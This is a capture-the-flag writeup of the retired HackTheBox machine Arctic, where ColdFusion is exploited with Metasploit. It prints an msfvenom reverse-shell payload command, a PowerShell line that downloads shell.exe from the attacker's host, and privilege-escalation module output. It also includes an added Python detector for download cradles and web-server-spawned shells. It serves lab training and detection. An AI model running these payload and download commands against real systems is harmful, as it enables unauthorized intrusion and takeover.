Ari Kalfus

Originally published at blog.artis3nal.com

Writeup: HackTheBox Arctic - with Metasploit

This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.

Arctic

Difficulty: Easy

Machine IP: 10.10.10.11

I run a quick port scan to identify the open ports:

```
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 22:21 EDT
Nmap scan report for 10.10.10.11
Host is up (0.018s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown
```

I then interrogate the three open ports:

```
nmap -A -sC -sV -Pn -p135,8500,49154 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 22:23 EDT
Nmap scan report for 10.10.10.11
Host is up (0.013s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

The 8500 port defies identification. Navigating to it in my browser, I see it is a web server.

I bust out gobuster. It times out trying to query the server. By manually navigating to a few test paths and counting seconds, I see the issue. The server waits 25 seconds before responding to any web request.

I extend gobuster's HTTP timeout to 35 seconds with the flag --timeout 35.

It takes a while for the brute force to run, but I eventually make my way to this page:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm

where I find a ColdFusion web server.

Searching for vulnerabilities on exploit-db with searchsploit coldfusion, I find the following:

Adobe ColdFusion 2018 - Arbitrary File Upload | exploits/multiple/webapps/45979.txt

Ah, and it has a matching Metasploit module: exploit/windows/http/coldfusion_fckeditor.

This module will not work out of the box, however, as its default timeout is 5 seconds.

The module file is located at /usr/share/metasploit-framework/modules/exploits/windows/http/coldfusion_fckeditor.rb.

You want to find the send_request_cgi and send_request_raw calls and change the trailing 5 (the timeout argument) to 30, to increase their timeouts from 5 seconds to 30 seconds.

(Screenshot: modifying the Metasploit module source to extend the timeout to 30 seconds)

From there, you can execute this exploit to obtain a user shell and the accompanying user flag.

Let's take this user shell and upgrade it to a Meterpreter shell so that we can run Metasploit's local privilege suggester for privilege escalation options.

We create a payload with msfvenom and start a local web server:

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.29 lport=4645 -f exe > shell.exe
sudo python3 -m http.server
```

Then, in our user shell on the target, we can execute this PowerShell one-liner to download the file:

```
powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.29:8000/shell.exe', 'fun.exe')"
```

From there we start a Meterpreter handler on port 4645 and run the fun.exe executable on the target. Our Meterpreter user shell connects.
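From a defender's side, the download cradle and the shell spawned under the web server are the noisy parts of this chain. The following is an added example (not part of the original writeup) that runs a small set of detection rules over constructed process-creation events; the parent-process names and the rule lists are assumptions, not values taken from the box.

```python
import re
from typing import Dict, List

# CONSTRUCTED process-creation events, reduced to the fields the check needs.
# The parent-process paths are assumptions about a ColdFusion host, not from the writeup.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ts": "2020-04-28T22:40:01Z",
     "parent": "C:\\JRun4\\bin\\jrun.exe",             # assumed ColdFusion host process
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c powershell \"(new-object System.Net.WebClient)"
                ".Downloadfile('http://10.10.14.29:8000/shell.exe', 'fun.exe')\""},
    {"ts": "2020-04-28T22:41:15Z",
     "parent": "C:\\Windows\\explorer.exe",           # interactive admin session
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Users"},
    {"ts": "2020-04-28T22:42:03Z",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\whoami.exe",
     "cmdline": "whoami"},
]

# Assumed lists: server processes that should never spawn a shell, and shell images.
WEB_SERVER_PARENTS = {"jrun.exe", "coldfusion.exe", "w3wp.exe", "httpd.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}

# The WebClient download cradle used in the writeup, plus the URL it fetches.
CRADLE_RE = re.compile(r"new-object\s+System\.Net\.WebClient", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"\.Download(File|String)\(\s*'(?P<url>[^']+)'", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased, so rules compare image names only."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the rule names an event triggers (empty list when it is clean)."""
    hits: List[str] = []
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    if parent in WEB_SERVER_PARENTS and image in SHELL_IMAGES:
        hits.append("webserver_spawned_shell")
    if CRADLE_RE.search(cmd):
        m = DOWNLOAD_RE.search(cmd)
        hits.append(f"powershell_download_cradle url={m.group('url') if m else '<unparsed>'}")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run every event through the rules and keep only those with findings."""
    return [{"ts": ev["ts"], "rules": h} for ev in events if (h := check_event(ev))]
```

Feeding it Sysmon Event ID 1 or Windows 4688 records with command-line auditing enabled gives the same two signals on real hosts.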

Now run post/multi/recon/local_exploit_suggester:

```
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.11 - Collecting local exploits for x64/windows...
[*] 10.10.10.11 - 15 exploit checks are being tried...
[+] 10.10.10.11 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[*] Post module execution completed
```

Our user is not in the Administrators group, so we cannot use the first two exploits.

The third exploit, exploit/windows/local/ms10_092_schelevator, is successful and we get a root shell. From here we can grab our root flag.
